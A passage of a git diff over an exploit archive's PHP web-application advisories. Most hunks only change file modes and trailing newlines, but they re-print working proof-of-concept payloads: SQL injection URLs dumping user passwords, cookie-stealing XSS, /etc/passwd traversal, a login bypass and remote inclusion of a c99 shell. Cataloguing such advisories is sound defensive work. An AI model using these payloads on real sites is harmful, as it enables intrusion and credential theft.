+6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Calcium 4.0.4 and 3.10 are vulnerable; other versions may also be affected. -http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss] \ No newline at end of file +http://www.example.com/cgi-bin/Calcium40.pl?Op=ShowIt&CalendarName=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/31866.txt b/platforms/php/webapps/31866.txt old mode 100755 new mode 100644 index 6219c5598..a41ce04ff --- a/platforms/php/webapps/31866.txt +++ b/platforms/php/webapps/31866.txt @@ -4,4 +4,4 @@ TorrentTrader Classic is prone to an SQL-injection vulnerability because it fail Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20 \ No newline at end of file +http://www.example.com/scrape.php?info_hash=%22union%20select%201,1,1,1,ip%20from%20users--%20%20%20 \ No newline at end of file diff --git a/platforms/php/webapps/31867.php b/platforms/php/webapps/31867.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31868.txt b/platforms/php/webapps/31868.txt old mode 100755 new mode 100644 index e0ca55ebe..78ff5be1b --- a/platforms/php/webapps/31868.txt +++ b/platforms/php/webapps/31868.txt @@ -10,4 +10,4 @@ The following example POST parameters are available to demonstrate this issue: userAccount: admin ' or 1=1/* userPassword: <anything> -userType: Staff \ No newline at end of file +userType: Staff \ No newline at end of file diff --git a/platforms/php/webapps/31880.txt b/platforms/php/webapps/31880.txt old mode 100755 new mode 100644 index 036160b76..00c1b4702 --- a/platforms/php/webapps/31880.txt +++ b/platforms/php/webapps/31880.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow WyMIEN PHP 1.0RC2 is vulnerable; other versions may also be affected. -http://www.example.com/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS] \ No newline at end of file +http://www.example.com/WyMienphp1.0-RC2/WyMienphp/index.php?f=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31881.txt b/platforms/php/webapps/31881.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31882.txt b/platforms/php/webapps/31882.txt old mode 100755 new mode 100644 index 0bd9be4f4..aa136d965 --- a/platforms/php/webapps/31882.txt +++ b/platforms/php/webapps/31882.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow SamTodo 1.1 is vulnerable; other versions may also be affected. -http://www.example.com/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit \ No newline at end of file +http://www.example.com/index.php?go=main.taskeditor&tid=f29de7fa-6625-4e20-8a19-11c0f4d799f6[XSS]&mode=edit \ No newline at end of file diff --git a/platforms/php/webapps/31883.txt b/platforms/php/webapps/31883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31888.txt b/platforms/php/webapps/31888.txt old mode 100755 new mode 100644 index 310e59353..5f1a18b7d --- a/platforms/php/webapps/31888.txt +++ b/platforms/php/webapps/31888.txt @@ -10,4 +10,4 @@ http://www.example.com/education/components/scrapbook/default.php?sectiondetaili http://www.example.com/education/district/district.php?sectiondetailid=#XSS http://www.example.com/education/admin/XSS http://www.example.com/education/components/XSS -http://www.example.com/education/components/whatsnew/default.php?sectiondetailid=#XSS \ No newline at end of file +http://www.example.com/education/components/whatsnew/default.php?sectiondetailid=#XSS \ No newline at end of file diff --git a/platforms/php/webapps/31893.txt b/platforms/php/webapps/31893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31898.txt b/platforms/php/webapps/31898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31902.txt b/platforms/php/webapps/31902.txt old mode 100755 new mode 100644 index 44be19e2c..60722bb42 --- a/platforms/php/webapps/31902.txt +++ b/platforms/php/webapps/31902.txt @@ -4,4 +4,4 @@ Noticia Portal is prone to an SQL-injection vulnerability because it fails to su Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/detalle_noticia.php?id_noticia=[SQL] \ No newline at end of file +http://www.example.com/detalle_noticia.php?id_noticia=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31904.txt b/platforms/php/webapps/31904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31905.txt b/platforms/php/webapps/31905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31906.txt b/platforms/php/webapps/31906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31907.txt b/platforms/php/webapps/31907.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31908.txt b/platforms/php/webapps/31908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3191.txt b/platforms/php/webapps/3191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31910.txt b/platforms/php/webapps/31910.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31916.txt b/platforms/php/webapps/31916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31929.txt b/platforms/php/webapps/31929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31933.txt b/platforms/php/webapps/31933.txt old mode 100755 new mode 100644 index ee743080e..36ec37fe0 --- a/platforms/php/webapps/31933.txt +++ b/platforms/php/webapps/31933.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow OpenDocMan 1.2.5 is vulnerable; other versions may also be affected. -http://www.example.com/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file +http://www.example.com/opendocman-1.2.5/out.php?last_message=%3Cscript%3Ealert(document.cookie)%3C/script%3E \ No newline at end of file diff --git a/platforms/php/webapps/31938.txt b/platforms/php/webapps/31938.txt old mode 100755 new mode 100644 index 2c68ea6f8..82d84981e --- a/platforms/php/webapps/31938.txt +++ b/platforms/php/webapps/31938.txt @@ -8,4 +8,4 @@ This issue affects photokorn 1.542; other versions may be vulnerable as well. The following proof-of-concept URI is available: -http://www.example.com/[path]/index.php?action=[SQL] \ No newline at end of file +http://www.example.com/[path]/index.php?action=[SQL] \ No newline at end of file diff --git a/platforms/php/webapps/31939.txt b/platforms/php/webapps/31939.txt old mode 100755 new mode 100644 index 51dfcf8fa..7b81e6e78 --- a/platforms/php/webapps/31939.txt +++ b/platforms/php/webapps/31939.txt @@ -7,4 +7,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow vBulletin 3.7.1 PL1 and 3.6.10 PL1 are vulnerable; prior versions may also be affected. http://www.example.com/vB3/modcp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K -http://www.example.com/vB3/modcp/index.php?redirect={XSS} \ No newline at end of file +http://www.example.com/vB3/modcp/index.php?redirect={XSS} \ No newline at end of file diff --git a/platforms/php/webapps/31943.html b/platforms/php/webapps/31943.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31944.txt b/platforms/php/webapps/31944.txt old mode 100755 new mode 100644 index afd033167..17617c727 --- a/platforms/php/webapps/31944.txt +++ b/platforms/php/webapps/31944.txt @@ -4,4 +4,4 @@ PHPAuction is prone to an SQL-injection vulnerability because it fails to suffic Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. -http://www.example.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* \ No newline at end of file +http://www.example.com/profile.php?user_id=1&auction_id=-2+union+select+concat_ws(0x2F2A2A2F,nick,password,email)+from+PHPAUCTION_users+limit+1,1/* \ No newline at end of file diff --git a/platforms/php/webapps/31945.txt b/platforms/php/webapps/31945.txt old mode 100755 new mode 100644 index 45d26dbc0..b97fc0b47 --- a/platforms/php/webapps/31945.txt +++ b/platforms/php/webapps/31945.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br http://www.example.com/path/template2.php?sitetitle=[XSS] http://www.example.com/path/template2.php?sitenav=[XSS] http://www.example.com/path/template2.php?sitemain=[XSS] -http://www.example.com/path/template2.php?sitealt=[XSS] \ No newline at end of file +http://www.example.com/path/template2.php?sitealt=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31946.txt b/platforms/php/webapps/31946.txt old mode 100755 new mode 100644 index 8da3e6f3e..812903421 --- a/platforms/php/webapps/31946.txt +++ b/platforms/php/webapps/31946.txt @@ -9,4 +9,4 @@ IDMOS 1.0 is vulnerable; other versions may also be affected. http://www.example.com/path/administrator/admin.php?site_absolute_path=[SHELL] http://www.example.com/path/administrator/menu_operation.php?site_absolute_path=[SHELL] http://www.example.com/path/administrator/template_add.php?site_absolute_path=[SHELL] -http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL] \ No newline at end of file +http://www.example.com/path/administrator/template_operation.php?site_absolute_path=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/31947.txt b/platforms/php/webapps/31947.txt old mode 100755 new mode 100644 index 964d488a1..73c7f6f07 --- a/platforms/php/webapps/31947.txt +++ b/platforms/php/webapps/31947.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc EXP Shop 1.0 is vulnerable; previous versions may also be affected. -http://www.example.com/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_expshop&page=show_payment&catid=-2 UNION SELECT @@version,@@version,concat(username,0x3a,password) FROM jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/31948.txt b/platforms/php/webapps/31948.txt old mode 100755 new mode 100644 index 5bfe867b3..f8e69a0c8 --- a/platforms/php/webapps/31948.txt +++ b/platforms/php/webapps/31948.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute malicious PHP code in the context ODARS 1.0.2 is vulnerable; other versions may be affected as well. -http://www.example.com/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL] \ No newline at end of file +http://www.example.com/path/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=[SHELL] \ No newline at end of file diff --git a/platforms/php/webapps/31949.txt b/platforms/php/webapps/31949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31950.txt b/platforms/php/webapps/31950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31951.txt b/platforms/php/webapps/31951.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31952.txt b/platforms/php/webapps/31952.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31953.txt b/platforms/php/webapps/31953.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31954.txt b/platforms/php/webapps/31954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31955.txt b/platforms/php/webapps/31955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31956.txt b/platforms/php/webapps/31956.txt old mode 100755 new mode 100644 index 5fdd32c0a..77298c7d3 --- a/platforms/php/webapps/31956.txt +++ b/platforms/php/webapps/31956.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica These issues affect 'benja CMS 0.1'; other versions may also be affected. -http://www.example.com/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS> \ No newline at end of file +http://www.example.com/[benjacms_path]/admin/admin_edit_topmenu.php/<XSS> \ No newline at end of file diff --git a/platforms/php/webapps/3196.php b/platforms/php/webapps/3196.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31960.txt b/platforms/php/webapps/31960.txt old mode 100755 new mode 100644 index 353517099..93ea2bd97 --- a/platforms/php/webapps/31960.txt +++ b/platforms/php/webapps/31960.txt @@ -9,4 +9,4 @@ These issues affect News Management System 0.3; other versions may also be vulne http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/system/include.php?skindir=[SHELL] http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?skindir=[LFI] http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/login.php?skindir=[LFI] -http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?e=[XSS] \ No newline at end of file +http://www.example.com/A_PHP_Scripts_News_Management_System_03/news/admin/register.php?e=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/31961.txt b/platforms/php/webapps/31961.txt old mode 100755 new mode 100644 index b75940a8b..b82ba6225 --- a/platforms/php/webapps/31961.txt +++ b/platforms/php/webapps/31961.txt @@ -121,4 +121,4 @@ Test Vulnerability : http://server/download.php?id=null/**/and/**/true/**/UNION/**/SELECT/**/CONCAT_WS(CHAR(32,58,32),user(),database(),version()),2-- http://server/gdl.php?newtheme=../../../../../../../../../../etc/passwd%00 http://server/gdl.php?newlang=../../../../../../../../../../etc/passwd%00 -http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK \ No newline at end of file +http://server/gdl.php?mod=search&action=folks&keyword=''"><script>alert(document.cookie)</script>&type=all&submit=OK \ No newline at end of file diff --git a/platforms/php/webapps/31970.txt b/platforms/php/webapps/31970.txt old mode 100755 new mode 100644 index e8352d436..b21493c47 --- a/platforms/php/webapps/31970.txt +++ b/platforms/php/webapps/31970.txt @@ -74,4 +74,4 @@ u_id=0&u_form=1&u_login='%3e"%3e%3cbody%2fonload%3dalert(9999)%3e&u_active=1&u_l # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) -# o/ \ No newline at end of file +# o/ \ No newline at end of file diff --git a/platforms/php/webapps/31971.txt b/platforms/php/webapps/31971.txt old mode 100755 new mode 100644 index 7d8b9903c..058965a9f --- a/platforms/php/webapps/31971.txt +++ b/platforms/php/webapps/31971.txt @@ -19,4 +19,4 @@ Host: 10.149.14.62 # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) -# o/ \ No newline at end of file +# o/ \ No newline at end of file diff --git a/platforms/php/webapps/31975.txt b/platforms/php/webapps/31975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31976.txt b/platforms/php/webapps/31976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31977.txt b/platforms/php/webapps/31977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31978.txt b/platforms/php/webapps/31978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3198.txt b/platforms/php/webapps/3198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31982.txt b/platforms/php/webapps/31982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31986.txt b/platforms/php/webapps/31986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/31989.txt b/platforms/php/webapps/31989.txt old mode 100755 new mode 100644 index 5d3a00173..387a029f6 --- a/platforms/php/webapps/31989.txt +++ b/platforms/php/webapps/31989.txt @@ -23,4 +23,4 @@ FormID=09607700a0e7ff0699503963022b5ae0944cd0bc&ReportType=Detail&OrderType=0&Da # ============================================================== # More @ http://HauntIT.blogspot.com # Thanks! ;) -# o/ \ No newline at end of file +# o/ \ No newline at end of file diff --git a/platforms/php/webapps/32001.txt b/platforms/php/webapps/32001.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32002.txt b/platforms/php/webapps/32002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32003.txt b/platforms/php/webapps/32003.txt old mode 100755 new mode 100644 index 3e767077b..40ae2da8e --- a/platforms/php/webapps/32003.txt +++ b/platforms/php/webapps/32003.txt @@ -7,4 +7,4 @@ A successful exploit could allow an attacker to compromise the application, acce RSS-aggregator 1.0 is vulnerable; other versions may also be affected. http://www.example.com/admin/fonctions/supprimer_flux.php?IdFlux=5 -http://www.example.com/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500 \ No newline at end of file +http://www.example.com/admin/fonctions/modifier_tps_rafraich.php?TpsRafraich=500 \ No newline at end of file diff --git a/platforms/php/webapps/32004.txt b/platforms/php/webapps/32004.txt old mode 100755 new mode 100644 index f975fc80b..9200b80de --- a/platforms/php/webapps/32004.txt +++ b/platforms/php/webapps/32004.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br FaName 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> http://www.example.com/[FANAME-DIRECTORY]/index.php?desc="><script>alert(document.cookies)</script> \ No newline at end of file +http://www.example.com/[FANAME-DIRECTORY]/index.php?key="><script>alert(document.cookies)</script> http://www.example.com/[FANAME-DIRECTORY]/index.php?desc="><script>alert(document.cookies)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32005.txt b/platforms/php/webapps/32005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3201.txt b/platforms/php/webapps/3201.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32010.txt b/platforms/php/webapps/32010.txt old mode 100755 new mode 100644 index 6a74ae1af..d44334730 --- a/platforms/php/webapps/32010.txt +++ b/platforms/php/webapps/32010.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a These issues affect 'com_is' 1.0.1; other versions may also be affected. http://www.example.com/index.php?option=com_is&task=model&marka=-1%20union%20select%201,2,concat(CHAR(60,117,115,101,114,62),".$uname.",CHAR(60,117,115,101,114,62)),4,5,6,7,8,9,10,11,12,13 from/**/".$magic."/** -http://www.example.com/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- \ No newline at end of file +http://www.example.com/index.php?option=com_is&task=motor&motor=-1%20union%20select%201,2,password,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users-- \ No newline at end of file diff --git a/platforms/php/webapps/32011.txt b/platforms/php/webapps/32011.txt old mode 100755 new mode 100644 index 362d79e1f..2d494f79f --- a/platforms/php/webapps/32011.txt +++ b/platforms/php/webapps/32011.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to DodosMail 2.5 is vulnerable; other versions may also be affected. -http://www.example.com/path/dodosmail.php?dodosmail_header_file=/../../../etc/passwd \ No newline at end of file +http://www.example.com/path/dodosmail.php?dodosmail_header_file=/../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32013.txt b/platforms/php/webapps/32013.txt old mode 100755 new mode 100644 index 1a1b628c1..1abf40e7d --- a/platforms/php/webapps/32013.txt +++ b/platforms/php/webapps/32013.txt @@ -11,4 +11,4 @@ UPDATE (July 2, 2009): The vendor disputes that Zoph is affected by these issues The following login credentials are reported to trigger this issue: username: '-- -password: '-- \ No newline at end of file +password: '-- \ No newline at end of file diff --git a/platforms/php/webapps/32014.txt b/platforms/php/webapps/32014.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32015.txt b/platforms/php/webapps/32015.txt old mode 100755 new mode 100644 index 6b43c6b54..91cfa5c1f --- a/platforms/php/webapps/32015.txt +++ b/platforms/php/webapps/32015.txt @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc This issue affects 4ndvddb 0.91; other versions may also be affected. -http://www.example.com/modules.php?name=4ndvddb&rop=show_dvd&id=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file +http://www.example.com/modules.php?name=4ndvddb&rop=show_dvd&id=1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,3,4,5,6,7,8,9,10%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A \ No newline at end of file diff --git a/platforms/php/webapps/32017.html b/platforms/php/webapps/32017.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3202.txt b/platforms/php/webapps/3202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32020.txt b/platforms/php/webapps/32020.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32021.txt b/platforms/php/webapps/32021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32022.txt b/platforms/php/webapps/32022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32023.txt b/platforms/php/webapps/32023.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32024.txt b/platforms/php/webapps/32024.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32025.txt b/platforms/php/webapps/32025.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32026.txt b/platforms/php/webapps/32026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32027.txt b/platforms/php/webapps/32027.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32028.txt b/platforms/php/webapps/32028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32029.txt b/platforms/php/webapps/32029.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3203.txt b/platforms/php/webapps/3203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32030.txt b/platforms/php/webapps/32030.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32031.txt b/platforms/php/webapps/32031.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32032.txt b/platforms/php/webapps/32032.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32033.txt b/platforms/php/webapps/32033.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32034.txt b/platforms/php/webapps/32034.txt old mode 100755 new mode 100644 index d4da103c9..9deae8ec1 --- a/platforms/php/webapps/32034.txt +++ b/platforms/php/webapps/32034.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow an attacker to compromise the application and V-webmail 1.6.4 is vulnerable; other versions may also be affected. -http://www.example.com/path/includes/cachedConfig.php?CONFIG[pear_dir]=http://www.example2.com \ No newline at end of file +http://www.example.com/path/includes/cachedConfig.php?CONFIG[pear_dir]=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/32035.txt b/platforms/php/webapps/32035.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32036.txt b/platforms/php/webapps/32036.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32037.txt b/platforms/php/webapps/32037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32038.txt b/platforms/php/webapps/32038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32039.txt b/platforms/php/webapps/32039.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32040.txt b/platforms/php/webapps/32040.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32045.txt b/platforms/php/webapps/32045.txt old mode 100755 new mode 100644 index 2357bdfde..e76405a56 --- a/platforms/php/webapps/32045.txt +++ b/platforms/php/webapps/32045.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br eSyndiCat Pro 2.2 is vulnerable; other versions may also be affected. -http://www.example.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script> \ No newline at end of file +http://www.example.com/register.php where username="><script>alert(12157312.477)</script>&email="><script>alert(12157312.477)</script>&password="><script>alert(12157312.477)</script>&password2="><script>alert(12157312.477)</script>&security_code="><script>alert(12157312.477)</script>&register="><script>alert(12157312.477)</script> \ No newline at end of file diff --git a/platforms/php/webapps/32047.txt b/platforms/php/webapps/32047.txt old mode 100755 new mode 100644 index e78a2e5f2..088fbd6f2 --- a/platforms/php/webapps/32047.txt +++ b/platforms/php/webapps/32047.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Hudson 1.223 is vulnerable; other versions may also be affected. -http://www.example.com/hudson/search/?q="><script>alert(1);</script> \ No newline at end of file +http://www.example.com/hudson/search/?q="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/3205.txt b/platforms/php/webapps/3205.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32051.php b/platforms/php/webapps/32051.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32053.txt b/platforms/php/webapps/32053.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32057.txt b/platforms/php/webapps/32057.txt old mode 100755 new mode 100644 index cf4213320..051de798f --- a/platforms/php/webapps/32057.txt +++ b/platforms/php/webapps/32057.txt @@ -7,4 +7,4 @@ Exploiting these issues can allow an attacker to compromise the application and ECMS 1.1 is vulnerable; other versions may also be affected. http://www.example.com/path/ecms/eprint.php?DOCUMENT_ROOT=shell.txt? -http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt? \ No newline at end of file +http://www.example.com/path/ecms/index.php?DOCUMENT_ROOT=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/32058.txt b/platforms/php/webapps/32058.txt old mode 100755 new mode 100644 index 5b183c4cc..f47511d6a --- a/platforms/php/webapps/32058.txt +++ b/platforms/php/webapps/32058.txt @@ -6,4 +6,4 @@ An attacker can exploit this issue to execute malicious PHP code in the context OpenPro 1.3.1 is vulnerable; other versions may also be affected. -http://www.example.com/path/search_wA.php?LIBPATH=[Evil] \ No newline at end of file +http://www.example.com/path/search_wA.php?LIBPATH=[Evil] \ No newline at end of file diff --git a/platforms/php/webapps/32059.txt b/platforms/php/webapps/32059.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3206.txt b/platforms/php/webapps/3206.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32060.txt b/platforms/php/webapps/32060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32061.txt b/platforms/php/webapps/32061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32062.txt b/platforms/php/webapps/32062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32063.txt b/platforms/php/webapps/32063.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32064.txt b/platforms/php/webapps/32064.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32065.txt b/platforms/php/webapps/32065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32066.txt b/platforms/php/webapps/32066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32067.txt b/platforms/php/webapps/32067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32068.txt b/platforms/php/webapps/32068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32069.txt b/platforms/php/webapps/32069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32070.txt b/platforms/php/webapps/32070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32071.txt b/platforms/php/webapps/32071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32075.txt b/platforms/php/webapps/32075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32076.txt b/platforms/php/webapps/32076.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32077.txt b/platforms/php/webapps/32077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32078.php b/platforms/php/webapps/32078.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32079.txt b/platforms/php/webapps/32079.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/3208.txt b/platforms/php/webapps/3208.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32080.txt b/platforms/php/webapps/32080.txt old mode 100755 new mode 100644 index ee6a46a1a..f1867a016 --- a/platforms/php/webapps/32080.txt +++ b/platforms/php/webapps/32080.txt @@ -6,4 +6,4 @@ Exploiting these issues can allow an attacker to compromise the application and CreaCMS 1 is vulnerable; other versions may also be affected. -http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php? \ No newline at end of file +http://www.example.com/creacms/_administration/fonctions/get_liste_langue.php?cfg[base_uri_admin]=http://127.0.0.1/c99.php? \ No newline at end of file diff --git a/platforms/php/webapps/32081.txt b/platforms/php/webapps/32081.txt old mode 100755 new mode 100644 index d19286d1a..27ae8b675 --- a/platforms/php/webapps/32081.txt +++ b/platforms/php/webapps/32081.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability using directory-traversal strings to Lemon CMS 1.10 is vulnerable; other versions may also be affected. -http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd \ No newline at end of file +http://www.example.com/lemon_includes/FCKeditor/editor/filemanager/browser/browser.php?dir=../../../../../../../../../../etc/passwd \ No newline at end of file diff --git a/platforms/php/webapps/32082.txt b/platforms/php/webapps/32082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/32083.txt b/platforms/php/webapps/32083.txt old mode 100755 new mode 100644 index 6d0c50c10..39fe50076 --- a/platforms/php/webapps/32083.txt +++ b/platforms/php/webapps/32083.txt @@ -6,4 +6,4 @@ Exploiting these issues could allow an attacker to compromise the application, a Def_Blog 1.0.3 is vulnerable; other versions may also be affected. -http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user-- \ No newline at end of file +http://www.example.com/[def_blog_path]/comlook.php?article=-1+union+select+1,2,3,4,concat(pseudo,0x3a3a,mdp),6,7+from+def_user-- \ No newline at end of file diff --git 